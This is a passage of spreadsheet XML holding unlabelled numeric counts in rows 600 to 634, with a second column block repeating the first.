      <c r="L600" s="8">
        <v>26</v>
      </c>
      <c r="M600" s="8">
        <v>1</v>
      </c>
      <c r="N600" s="8">
        <v>4</v>
      </c>
      <c r="O600" s="8">
        <v>0</v>
      </c>
      <c r="P600" s="8">
        <v>5</v>
      </c>
      <c r="Q600" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="601" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A601" s="7">
        <v>1472</v>
      </c>
      <c r="B601" s="8">
        <v>25</v>
      </c>
      <c r="C601" s="8">
        <v>0</v>
      </c>
      <c r="D601" s="8">
        <v>32</v>
      </c>
      <c r="E601" s="8">
        <v>27</v>
      </c>
      <c r="F601" s="8">
        <v>20</v>
      </c>
      <c r="G601" s="8">
        <v>6</v>
      </c>
      <c r="H601" s="8">
        <v>110</v>
      </c>
      <c r="K601" s="7">
        <v>1472</v>
      </c>
      <c r="L601" s="8">
        <v>25</v>
      </c>
      <c r="M601" s="8">
        <v>0</v>
      </c>
      <c r="N601" s="8">
        <v>32</v>
      </c>
      <c r="O601" s="8">
        <v>27</v>
      </c>
      <c r="P601" s="8">
        <v>20</v>
      </c>
      <c r="Q601" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="602" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A602" s="7">
        <v>1478</v>
      </c>
      <c r="B602" s="8">
        <v>26</v>
      </c>
      <c r="C602" s="8">
        <v>3</v>
      </c>
      <c r="D602" s="8">
        <v>10</v>
      </c>
      <c r="E602" s="8">
        <v>7</v>
      </c>
      <c r="F602" s="8">
        <v>27</v>
      </c>
      <c r="G602" s="8">
        <v>132</v>
      </c>
      <c r="H602" s="8">
        <v>205</v>
      </c>
      <c r="K602" s="7">
        <v>1478</v>
      </c>
      <c r="L602" s="8">
        <v>26</v>
      </c>
      <c r="M602" s="8">
        <v>3</v>
      </c>
      <c r="N602" s="8">
        <v>10</v>
      </c>
      <c r="O602" s="8">
        <v>7</v>
      </c>
      <c r="P602" s="8">
        <v>27</v>
      </c>
      <c r="Q602" s="8">
        <v>132</v>
      </c>
    </row>
    <row r="603" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A603" s="7">
        <v>1487</v>
      </c>
      <c r="B603" s="8">
        <v>25</v>
      </c>
      <c r="C603" s="8">
        <v>2</v>
      </c>
      <c r="D603" s="8">
        <v>210</v>
      </c>
      <c r="E603" s="8">
        <v>367</v>
      </c>
      <c r="F603" s="8">
        <v>18</v>
      </c>
      <c r="G603" s="8">
        <v>47</v>
      </c>
      <c r="H603" s="8">
        <v>669</v>
      </c>
      <c r="K603" s="7">
        <v>1487</v>
      </c>
      <c r="L603" s="8">
        <v>25</v>
      </c>
      <c r="M603" s="8">
        <v>2</v>
      </c>
      <c r="N603" s="8">
        <v>210</v>
      </c>
      <c r="O603" s="8">
        <v>367</v>
      </c>
      <c r="P603" s="8">
        <v>18</v>
      </c>
      <c r="Q603" s="8">
        <v>47</v>
      </c>
    </row>
    <row r="604" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A604" s="7">
        <v>1488</v>
      </c>
      <c r="B604" s="8">
        <v>0</v>
      </c>
      <c r="C604" s="8">
        <v>0</v>
      </c>
      <c r="D604" s="8">
        <v>0</v>
      </c>
      <c r="E604" s="8">
        <v>0</v>
      </c>
      <c r="F604" s="8">
        <v>20</v>
      </c>
      <c r="G604" s="8">
        <v>1</v>
      </c>
      <c r="H604" s="8">
        <v>21</v>
      </c>
      <c r="K604" s="7">
        <v>1488</v>
      </c>
      <c r="L604" s="8">
        <v>0</v>
      </c>
      <c r="M604" s="8">
        <v>0</v>
      </c>
      <c r="N604" s="8">
        <v>0</v>
      </c>
      <c r="O604" s="8">
        <v>0</v>
      </c>
      <c r="P604" s="8">
        <v>20</v>
      </c>
      <c r="Q604" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="605" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A605" s="7">
        <v>1489</v>
      </c>
      <c r="B605" s="8">
        <v>25</v>
      </c>
      <c r="C605" s="8">
        <v>1</v>
      </c>
      <c r="D605" s="8">
        <v>22</v>
      </c>
      <c r="E605" s="8">
        <v>25</v>
      </c>
      <c r="F605" s="8">
        <v>7</v>
      </c>
      <c r="G605" s="8">
        <v>3</v>
      </c>
      <c r="H605" s="8">
        <v>83</v>
      </c>
      <c r="K605" s="7">
        <v>1489</v>
      </c>
      <c r="L605" s="8">
        <v>25</v>
      </c>
      <c r="M605" s="8">
        <v>1</v>
      </c>
      <c r="N605" s="8">
        <v>22</v>
      </c>
      <c r="O605" s="8">
        <v>25</v>
      </c>
      <c r="P605" s="8">
        <v>7</v>
      </c>
      <c r="Q605" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="606" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A606" s="7">
        <v>1490</v>
      </c>
      <c r="B606" s="8">
        <v>0</v>
      </c>
      <c r="C606" s="8">
        <v>0</v>
      </c>
      <c r="D606" s="8">
        <v>0</v>
      </c>
      <c r="E606" s="8">
        <v>0</v>
      </c>
      <c r="F606" s="8">
        <v>4</v>
      </c>
      <c r="G606" s="8">
        <v>2</v>
      </c>
      <c r="H606" s="8">
        <v>6</v>
      </c>
      <c r="K606" s="7">
        <v>1490</v>
      </c>
      <c r="L606" s="8">
        <v>0</v>
      </c>
      <c r="M606" s="8">
        <v>0</v>
      </c>
      <c r="N606" s="8">
        <v>0</v>
      </c>
      <c r="O606" s="8">
        <v>0</v>
      </c>
      <c r="P606" s="8">
        <v>4</v>
      </c>
      <c r="Q606" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="607" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A607" s="7">
        <v>1492</v>
      </c>
      <c r="B607" s="8">
        <v>24</v>
      </c>
      <c r="C607" s="8">
        <v>1</v>
      </c>
      <c r="D607" s="8">
        <v>0</v>
      </c>
      <c r="E607" s="8">
        <v>0</v>
      </c>
      <c r="F607" s="8">
        <v>1</v>
      </c>
      <c r="G607" s="8">
        <v>3</v>
      </c>
      <c r="H607" s="8">
        <v>29</v>
      </c>
      <c r="K607" s="7">
        <v>1492</v>
      </c>
      <c r="L607" s="8">
        <v>24</v>
      </c>
      <c r="M607" s="8">
        <v>1</v>
      </c>
      <c r="N607" s="8">
        <v>0</v>
      </c>
      <c r="O607" s="8">
        <v>0</v>
      </c>
      <c r="P607" s="8">
        <v>1</v>
      </c>
      <c r="Q607" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="608" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A608" s="7">
        <v>1494</v>
      </c>
      <c r="B608" s="8">
        <v>0</v>
      </c>
      <c r="C608" s="8">
        <v>0</v>
      </c>
      <c r="D608" s="8">
        <v>2</v>
      </c>
      <c r="E608" s="8">
        <v>0</v>
      </c>
      <c r="F608" s="8">
        <v>6</v>
      </c>
      <c r="G608" s="8">
        <v>0</v>
      </c>
      <c r="H608" s="8">
        <v>8</v>
      </c>
      <c r="K608" s="7">
        <v>1494</v>
      </c>
      <c r="L608" s="8">
        <v>0</v>
      </c>
      <c r="M608" s="8">
        <v>0</v>
      </c>
      <c r="N608" s="8">
        <v>2</v>
      </c>
      <c r="O608" s="8">
        <v>0</v>
      </c>
      <c r="P608" s="8">
        <v>6</v>
      </c>
      <c r="Q608" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="609" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A609" s="7">
        <v>1497</v>
      </c>
      <c r="B609" s="8">
        <v>26</v>
      </c>
      <c r="C609" s="8">
        <v>0</v>
      </c>
      <c r="D609" s="8">
        <v>10</v>
      </c>
      <c r="E609" s="8">
        <v>50</v>
      </c>
      <c r="F609" s="8">
        <v>11</v>
      </c>
      <c r="G609" s="8">
        <v>4</v>
      </c>
      <c r="H609" s="8">
        <v>101</v>
      </c>
      <c r="K609" s="7">
        <v>1497</v>
      </c>
      <c r="L609" s="8">
        <v>26</v>
      </c>
      <c r="M609" s="8">
        <v>0</v>
      </c>
      <c r="N609" s="8">
        <v>10</v>
      </c>
      <c r="O609" s="8">
        <v>50</v>
      </c>
      <c r="P609" s="8">
        <v>11</v>
      </c>
      <c r="Q609" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="610" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A610" s="7">
        <v>1498</v>
      </c>
      <c r="B610" s="8">
        <v>6</v>
      </c>
      <c r="C610" s="8">
        <v>0</v>
      </c>
      <c r="D610" s="8">
        <v>0</v>
      </c>
      <c r="E610" s="8">
        <v>0</v>
      </c>
      <c r="F610" s="8">
        <v>8</v>
      </c>
      <c r="G610" s="8">
        <v>7</v>
      </c>
      <c r="H610" s="8">
        <v>21</v>
      </c>
      <c r="K610" s="7">
        <v>1498</v>
      </c>
      <c r="L610" s="8">
        <v>6</v>
      </c>
      <c r="M610" s="8">
        <v>0</v>
      </c>
      <c r="N610" s="8">
        <v>0</v>
      </c>
      <c r="O610" s="8">
        <v>0</v>
      </c>
      <c r="P610" s="8">
        <v>8</v>
      </c>
      <c r="Q610" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="611" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A611" s="7">
        <v>1499</v>
      </c>
      <c r="B611" s="8">
        <v>26</v>
      </c>
      <c r="C611" s="8">
        <v>1</v>
      </c>
      <c r="D611" s="8">
        <v>42</v>
      </c>
      <c r="E611" s="8">
        <v>52</v>
      </c>
      <c r="F611" s="8">
        <v>5</v>
      </c>
      <c r="G611" s="8">
        <v>4</v>
      </c>
      <c r="H611" s="8">
        <v>130</v>
      </c>
      <c r="K611" s="7">
        <v>1499</v>
      </c>
      <c r="L611" s="8">
        <v>26</v>
      </c>
      <c r="M611" s="8">
        <v>1</v>
      </c>
      <c r="N611" s="8">
        <v>42</v>
      </c>
      <c r="O611" s="8">
        <v>52</v>
      </c>
      <c r="P611" s="8">
        <v>5</v>
      </c>
      <c r="Q611" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="612" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A612" s="7">
        <v>1500</v>
      </c>
      <c r="B612" s="8">
        <v>30</v>
      </c>
      <c r="C612" s="8">
        <v>1</v>
      </c>
      <c r="D612" s="8">
        <v>10</v>
      </c>
      <c r="E612" s="8">
        <v>5</v>
      </c>
      <c r="F612" s="8">
        <v>0</v>
      </c>
      <c r="G612" s="8">
        <v>3</v>
      </c>
      <c r="H612" s="8">
        <v>49</v>
      </c>
      <c r="K612" s="7">
        <v>1500</v>
      </c>
      <c r="L612" s="8">
        <v>30</v>
      </c>
      <c r="M612" s="8">
        <v>1</v>
      </c>
      <c r="N612" s="8">
        <v>10</v>
      </c>
      <c r="O612" s="8">
        <v>5</v>
      </c>
      <c r="P612" s="8">
        <v>0</v>
      </c>
      <c r="Q612" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="613" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A613" s="7">
        <v>1502</v>
      </c>
      <c r="B613" s="8">
        <v>7</v>
      </c>
      <c r="C613" s="8">
        <v>0</v>
      </c>
      <c r="D613" s="8">
        <v>0</v>
      </c>
      <c r="E613" s="8">
        <v>0</v>
      </c>
      <c r="F613" s="8">
        <v>18</v>
      </c>
      <c r="G613" s="8">
        <v>3</v>
      </c>
      <c r="H613" s="8">
        <v>28</v>
      </c>
      <c r="K613" s="7">
        <v>1502</v>
      </c>
      <c r="L613" s="8">
        <v>7</v>
      </c>
      <c r="M613" s="8">
        <v>0</v>
      </c>
      <c r="N613" s="8">
        <v>0</v>
      </c>
      <c r="O613" s="8">
        <v>0</v>
      </c>
      <c r="P613" s="8">
        <v>18</v>
      </c>
      <c r="Q613" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="614" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A614" s="7">
        <v>1503</v>
      </c>
      <c r="B614" s="8">
        <v>25</v>
      </c>
      <c r="C614" s="8">
        <v>1</v>
      </c>
      <c r="D614" s="8">
        <v>5</v>
      </c>
      <c r="E614" s="8">
        <v>5</v>
      </c>
      <c r="F614" s="8">
        <v>8</v>
      </c>
      <c r="G614" s="8">
        <v>3</v>
      </c>
      <c r="H614" s="8">
        <v>47</v>
      </c>
      <c r="K614" s="7">
        <v>1503</v>
      </c>
      <c r="L614" s="8">
        <v>25</v>
      </c>
      <c r="M614" s="8">
        <v>1</v>
      </c>
      <c r="N614" s="8">
        <v>5</v>
      </c>
      <c r="O614" s="8">
        <v>5</v>
      </c>
      <c r="P614" s="8">
        <v>8</v>
      </c>
      <c r="Q614" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="615" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A615" s="7">
        <v>1507</v>
      </c>
      <c r="B615" s="8">
        <v>24</v>
      </c>
      <c r="C615" s="8">
        <v>24</v>
      </c>
      <c r="D615" s="8">
        <v>0</v>
      </c>
      <c r="E615" s="8">
        <v>0</v>
      </c>
      <c r="F615" s="8">
        <v>7</v>
      </c>
      <c r="G615" s="8">
        <v>1</v>
      </c>
      <c r="H615" s="8">
        <v>56</v>
      </c>
      <c r="K615" s="7">
        <v>1507</v>
      </c>
      <c r="L615" s="8">
        <v>24</v>
      </c>
      <c r="M615" s="8">
        <v>24</v>
      </c>
      <c r="N615" s="8">
        <v>0</v>
      </c>
      <c r="O615" s="8">
        <v>0</v>
      </c>
      <c r="P615" s="8">
        <v>7</v>
      </c>
      <c r="Q615" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="616" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A616" s="7">
        <v>1508</v>
      </c>
      <c r="B616" s="8">
        <v>6</v>
      </c>
      <c r="C616" s="8">
        <v>1</v>
      </c>
      <c r="D616" s="8">
        <v>2</v>
      </c>
      <c r="E616" s="8">
        <v>2</v>
      </c>
      <c r="F616" s="8">
        <v>4</v>
      </c>
      <c r="G616" s="8">
        <v>4</v>
      </c>
      <c r="H616" s="8">
        <v>19</v>
      </c>
      <c r="K616" s="7">
        <v>1508</v>
      </c>
      <c r="L616" s="8">
        <v>6</v>
      </c>
      <c r="M616" s="8">
        <v>1</v>
      </c>
      <c r="N616" s="8">
        <v>2</v>
      </c>
      <c r="O616" s="8">
        <v>2</v>
      </c>
      <c r="P616" s="8">
        <v>4</v>
      </c>
      <c r="Q616" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="617" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A617" s="7">
        <v>1509</v>
      </c>
      <c r="B617" s="8">
        <v>26</v>
      </c>
      <c r="C617" s="8">
        <v>1</v>
      </c>
      <c r="D617" s="8">
        <v>10</v>
      </c>
      <c r="E617" s="8">
        <v>2</v>
      </c>
      <c r="F617" s="8">
        <v>8</v>
      </c>
      <c r="G617" s="8">
        <v>3</v>
      </c>
      <c r="H617" s="8">
        <v>50</v>
      </c>
      <c r="K617" s="7">
        <v>1509</v>
      </c>
      <c r="L617" s="8">
        <v>26</v>
      </c>
      <c r="M617" s="8">
        <v>1</v>
      </c>
      <c r="N617" s="8">
        <v>10</v>
      </c>
      <c r="O617" s="8">
        <v>2</v>
      </c>
      <c r="P617" s="8">
        <v>8</v>
      </c>
      <c r="Q617" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="618" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A618" s="7">
        <v>1510</v>
      </c>
      <c r="B618" s="8">
        <v>26</v>
      </c>
      <c r="C618" s="8">
        <v>1</v>
      </c>
      <c r="D618" s="8">
        <v>25</v>
      </c>
      <c r="E618" s="8">
        <v>30</v>
      </c>
      <c r="F618" s="8">
        <v>8</v>
      </c>
      <c r="G618" s="8">
        <v>3</v>
      </c>
      <c r="H618" s="8">
        <v>93</v>
      </c>
      <c r="K618" s="7">
        <v>1510</v>
      </c>
      <c r="L618" s="8">
        <v>26</v>
      </c>
      <c r="M618" s="8">
        <v>1</v>
      </c>
      <c r="N618" s="8">
        <v>25</v>
      </c>
      <c r="O618" s="8">
        <v>30</v>
      </c>
      <c r="P618" s="8">
        <v>8</v>
      </c>
      <c r="Q618" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="619" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A619" s="7">
        <v>1512</v>
      </c>
      <c r="B619" s="8">
        <v>26</v>
      </c>
      <c r="C619" s="8">
        <v>1</v>
      </c>
      <c r="D619" s="8">
        <v>9</v>
      </c>
      <c r="E619" s="8">
        <v>11</v>
      </c>
      <c r="F619" s="8">
        <v>6</v>
      </c>
      <c r="G619" s="8">
        <v>0</v>
      </c>
      <c r="H619" s="8">
        <v>53</v>
      </c>
      <c r="K619" s="7">
        <v>1512</v>
      </c>
      <c r="L619" s="8">
        <v>26</v>
      </c>
      <c r="M619" s="8">
        <v>1</v>
      </c>
      <c r="N619" s="8">
        <v>9</v>
      </c>
      <c r="O619" s="8">
        <v>11</v>
      </c>
      <c r="P619" s="8">
        <v>6</v>
      </c>
      <c r="Q619" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="620" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A620" s="7">
        <v>1514</v>
      </c>
      <c r="B620" s="8">
        <v>54</v>
      </c>
      <c r="C620" s="8">
        <v>4</v>
      </c>
      <c r="D620" s="8">
        <v>8</v>
      </c>
      <c r="E620" s="8">
        <v>4</v>
      </c>
      <c r="F620" s="8">
        <v>2</v>
      </c>
      <c r="G620" s="8">
        <v>1</v>
      </c>
      <c r="H620" s="8">
        <v>73</v>
      </c>
      <c r="K620" s="7">
        <v>1514</v>
      </c>
      <c r="L620" s="8">
        <v>54</v>
      </c>
      <c r="M620" s="8">
        <v>4</v>
      </c>
      <c r="N620" s="8">
        <v>8</v>
      </c>
      <c r="O620" s="8">
        <v>4</v>
      </c>
      <c r="P620" s="8">
        <v>2</v>
      </c>
      <c r="Q620" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="621" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A621" s="7">
        <v>1515</v>
      </c>
      <c r="B621" s="8">
        <v>22</v>
      </c>
      <c r="C621" s="8">
        <v>1</v>
      </c>
      <c r="D621" s="8">
        <v>0</v>
      </c>
      <c r="E621" s="8">
        <v>1</v>
      </c>
      <c r="F621" s="8">
        <v>8</v>
      </c>
      <c r="G621" s="8">
        <v>3</v>
      </c>
      <c r="H621" s="8">
        <v>35</v>
      </c>
      <c r="K621" s="7">
        <v>1515</v>
      </c>
      <c r="L621" s="8">
        <v>22</v>
      </c>
      <c r="M621" s="8">
        <v>1</v>
      </c>
      <c r="N621" s="8">
        <v>0</v>
      </c>
      <c r="O621" s="8">
        <v>1</v>
      </c>
      <c r="P621" s="8">
        <v>8</v>
      </c>
      <c r="Q621" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="622" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A622" s="7">
        <v>1517</v>
      </c>
      <c r="B622" s="8">
        <v>0</v>
      </c>
      <c r="C622" s="8">
        <v>0</v>
      </c>
      <c r="D622" s="8">
        <v>15</v>
      </c>
      <c r="E622" s="8">
        <v>8</v>
      </c>
      <c r="F622" s="8">
        <v>1</v>
      </c>
      <c r="G622" s="8">
        <v>1</v>
      </c>
      <c r="H622" s="8">
        <v>25</v>
      </c>
      <c r="K622" s="7">
        <v>1517</v>
      </c>
      <c r="L622" s="8">
        <v>0</v>
      </c>
      <c r="M622" s="8">
        <v>0</v>
      </c>
      <c r="N622" s="8">
        <v>15</v>
      </c>
      <c r="O622" s="8">
        <v>8</v>
      </c>
      <c r="P622" s="8">
        <v>1</v>
      </c>
      <c r="Q622" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="623" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A623" s="7">
        <v>1518</v>
      </c>
      <c r="B623" s="8">
        <v>25</v>
      </c>
      <c r="C623" s="8">
        <v>2</v>
      </c>
      <c r="D623" s="8">
        <v>24</v>
      </c>
      <c r="E623" s="8">
        <v>6</v>
      </c>
      <c r="F623" s="8">
        <v>41</v>
      </c>
      <c r="G623" s="8">
        <v>3</v>
      </c>
      <c r="H623" s="8">
        <v>101</v>
      </c>
      <c r="K623" s="7">
        <v>1518</v>
      </c>
      <c r="L623" s="8">
        <v>25</v>
      </c>
      <c r="M623" s="8">
        <v>2</v>
      </c>
      <c r="N623" s="8">
        <v>24</v>
      </c>
      <c r="O623" s="8">
        <v>6</v>
      </c>
      <c r="P623" s="8">
        <v>41</v>
      </c>
      <c r="Q623" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="624" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A624" s="7">
        <v>1519</v>
      </c>
      <c r="B624" s="8">
        <v>0</v>
      </c>
      <c r="C624" s="8">
        <v>0</v>
      </c>
      <c r="D624" s="8">
        <v>5</v>
      </c>
      <c r="E624" s="8">
        <v>20</v>
      </c>
      <c r="F624" s="8">
        <v>6</v>
      </c>
      <c r="G624" s="8">
        <v>6</v>
      </c>
      <c r="H624" s="8">
        <v>37</v>
      </c>
      <c r="K624" s="7">
        <v>1519</v>
      </c>
      <c r="L624" s="8">
        <v>0</v>
      </c>
      <c r="M624" s="8">
        <v>0</v>
      </c>
      <c r="N624" s="8">
        <v>5</v>
      </c>
      <c r="O624" s="8">
        <v>20</v>
      </c>
      <c r="P624" s="8">
        <v>6</v>
      </c>
      <c r="Q624" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="625" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A625" s="7">
        <v>1522</v>
      </c>
      <c r="B625" s="8">
        <v>26</v>
      </c>
      <c r="C625" s="8">
        <v>1</v>
      </c>
      <c r="D625" s="8">
        <v>10</v>
      </c>
      <c r="E625" s="8">
        <v>0</v>
      </c>
      <c r="F625" s="8">
        <v>9</v>
      </c>
      <c r="G625" s="8">
        <v>1</v>
      </c>
      <c r="H625" s="8">
        <v>47</v>
      </c>
      <c r="K625" s="7">
        <v>1522</v>
      </c>
      <c r="L625" s="8">
        <v>26</v>
      </c>
      <c r="M625" s="8">
        <v>1</v>
      </c>
      <c r="N625" s="8">
        <v>10</v>
      </c>
      <c r="O625" s="8">
        <v>0</v>
      </c>
      <c r="P625" s="8">
        <v>9</v>
      </c>
      <c r="Q625" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="626" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A626" s="7">
        <v>1527</v>
      </c>
      <c r="B626" s="8">
        <v>25</v>
      </c>
      <c r="C626" s="8">
        <v>3</v>
      </c>
      <c r="D626" s="8">
        <v>305</v>
      </c>
      <c r="E626" s="8">
        <v>35</v>
      </c>
      <c r="F626" s="8">
        <v>13</v>
      </c>
      <c r="G626" s="8">
        <v>29</v>
      </c>
      <c r="H626" s="8">
        <v>410</v>
      </c>
      <c r="K626" s="7">
        <v>1527</v>
      </c>
      <c r="L626" s="8">
        <v>25</v>
      </c>
      <c r="M626" s="8">
        <v>3</v>
      </c>
      <c r="N626" s="8">
        <v>305</v>
      </c>
      <c r="O626" s="8">
        <v>35</v>
      </c>
      <c r="P626" s="8">
        <v>13</v>
      </c>
      <c r="Q626" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="627" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A627" s="7">
        <v>1529</v>
      </c>
      <c r="B627" s="8">
        <v>30</v>
      </c>
      <c r="C627" s="8">
        <v>2</v>
      </c>
      <c r="D627" s="8">
        <v>0</v>
      </c>
      <c r="E627" s="8">
        <v>0</v>
      </c>
      <c r="F627" s="8">
        <v>5</v>
      </c>
      <c r="G627" s="8">
        <v>1</v>
      </c>
      <c r="H627" s="8">
        <v>38</v>
      </c>
      <c r="K627" s="7">
        <v>1529</v>
      </c>
      <c r="L627" s="8">
        <v>30</v>
      </c>
      <c r="M627" s="8">
        <v>2</v>
      </c>
      <c r="N627" s="8">
        <v>0</v>
      </c>
      <c r="O627" s="8">
        <v>0</v>
      </c>
      <c r="P627" s="8">
        <v>5</v>
      </c>
      <c r="Q627" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="628" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A628" s="7">
        <v>1531</v>
      </c>
      <c r="B628" s="8">
        <v>6</v>
      </c>
      <c r="C628" s="8">
        <v>1</v>
      </c>
      <c r="D628" s="8">
        <v>15</v>
      </c>
      <c r="E628" s="8">
        <v>0</v>
      </c>
      <c r="F628" s="8">
        <v>32</v>
      </c>
      <c r="G628" s="8">
        <v>7</v>
      </c>
      <c r="H628" s="8">
        <v>61</v>
      </c>
      <c r="K628" s="7">
        <v>1531</v>
      </c>
      <c r="L628" s="8">
        <v>6</v>
      </c>
      <c r="M628" s="8">
        <v>1</v>
      </c>
      <c r="N628" s="8">
        <v>15</v>
      </c>
      <c r="O628" s="8">
        <v>0</v>
      </c>
      <c r="P628" s="8">
        <v>32</v>
      </c>
      <c r="Q628" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="629" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A629" s="7">
        <v>1536</v>
      </c>
      <c r="B629" s="8">
        <v>25</v>
      </c>
      <c r="C629" s="8">
        <v>1</v>
      </c>
      <c r="D629" s="8">
        <v>9</v>
      </c>
      <c r="E629" s="8">
        <v>10</v>
      </c>
      <c r="F629" s="8">
        <v>14</v>
      </c>
      <c r="G629" s="8">
        <v>11</v>
      </c>
      <c r="H629" s="8">
        <v>70</v>
      </c>
      <c r="K629" s="7">
        <v>1536</v>
      </c>
      <c r="L629" s="8">
        <v>25</v>
      </c>
      <c r="M629" s="8">
        <v>1</v>
      </c>
      <c r="N629" s="8">
        <v>9</v>
      </c>
      <c r="O629" s="8">
        <v>10</v>
      </c>
      <c r="P629" s="8">
        <v>14</v>
      </c>
      <c r="Q629" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="630" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A630" s="7">
        <v>1542</v>
      </c>
      <c r="B630" s="8">
        <v>6</v>
      </c>
      <c r="C630" s="8">
        <v>2</v>
      </c>
      <c r="D630" s="8">
        <v>17</v>
      </c>
      <c r="E630" s="8">
        <v>0</v>
      </c>
      <c r="F630" s="8">
        <v>3</v>
      </c>
      <c r="G630" s="8">
        <v>0</v>
      </c>
      <c r="H630" s="8">
        <v>28</v>
      </c>
      <c r="K630" s="7">
        <v>1542</v>
      </c>
      <c r="L630" s="8">
        <v>6</v>
      </c>
      <c r="M630" s="8">
        <v>2</v>
      </c>
      <c r="N630" s="8">
        <v>17</v>
      </c>
      <c r="O630" s="8">
        <v>0</v>
      </c>
      <c r="P630" s="8">
        <v>3</v>
      </c>
      <c r="Q630" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="631" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A631" s="7">
        <v>1543</v>
      </c>
      <c r="B631" s="8">
        <v>25</v>
      </c>
      <c r="C631" s="8">
        <v>1</v>
      </c>
      <c r="D631" s="8">
        <v>13</v>
      </c>
      <c r="E631" s="8">
        <v>26</v>
      </c>
      <c r="F631" s="8">
        <v>10</v>
      </c>
      <c r="G631" s="8">
        <v>11</v>
      </c>
      <c r="H631" s="8">
        <v>86</v>
      </c>
      <c r="K631" s="7">
        <v>1543</v>
      </c>
      <c r="L631" s="8">
        <v>25</v>
      </c>
      <c r="M631" s="8">
        <v>1</v>
      </c>
      <c r="N631" s="8">
        <v>13</v>
      </c>
      <c r="O631" s="8">
        <v>26</v>
      </c>
      <c r="P631" s="8">
        <v>10</v>
      </c>
      <c r="Q631" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="632" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A632" s="7">
        <v>1546</v>
      </c>
      <c r="B632" s="8">
        <v>25</v>
      </c>
      <c r="C632" s="8">
        <v>1</v>
      </c>
      <c r="D632" s="8">
        <v>2</v>
      </c>
      <c r="E632" s="8">
        <v>4</v>
      </c>
      <c r="F632" s="8">
        <v>2</v>
      </c>
      <c r="G632" s="8">
        <v>0</v>
      </c>
      <c r="H632" s="8">
        <v>34</v>
      </c>
      <c r="K632" s="7">
        <v>1546</v>
      </c>
      <c r="L632" s="8">
        <v>25</v>
      </c>
      <c r="M632" s="8">
        <v>1</v>
      </c>
      <c r="N632" s="8">
        <v>2</v>
      </c>
      <c r="O632" s="8">
        <v>4</v>
      </c>
      <c r="P632" s="8">
        <v>2</v>
      </c>
      <c r="Q632" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="633" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A633" s="7">
        <v>1554</v>
      </c>
      <c r="B633" s="8">
        <v>28</v>
      </c>
      <c r="C633" s="8">
        <v>1</v>
      </c>
      <c r="D633" s="8">
        <v>7</v>
      </c>
      <c r="E633" s="8">
        <v>1</v>
      </c>
      <c r="F633" s="8">
        <v>6</v>
      </c>
      <c r="G633" s="8">
        <v>1</v>
      </c>
      <c r="H633" s="8">
        <v>44</v>
      </c>
      <c r="K633" s="7">
        <v>1554</v>
      </c>
      <c r="L633" s="8">
        <v>28</v>
      </c>
      <c r="M633" s="8">
        <v>1</v>
      </c>
      <c r="N633" s="8">
        <v>7</v>
      </c>
      <c r="O633" s="8">
        <v>1</v>
      </c>
      <c r="P633" s="8">
        <v>6</v>
      </c>
      <c r="Q633" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="634" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A634" s="7">
        <v>1556</v>
      </c>
      <c r="B634" s="8">
        <v>5</v>
      </c>
      <c r="C634" s="8">
        <v>1</v>
      </c>
      <c r="D634" s="8">
        <v>33</v>
      </c>
      <c r="E634" s="8">
        <v>381</v>
      </c>
      <c r="F634" s="8">
        <v>26</v>
      </c>
      <c r="G634" s="8">
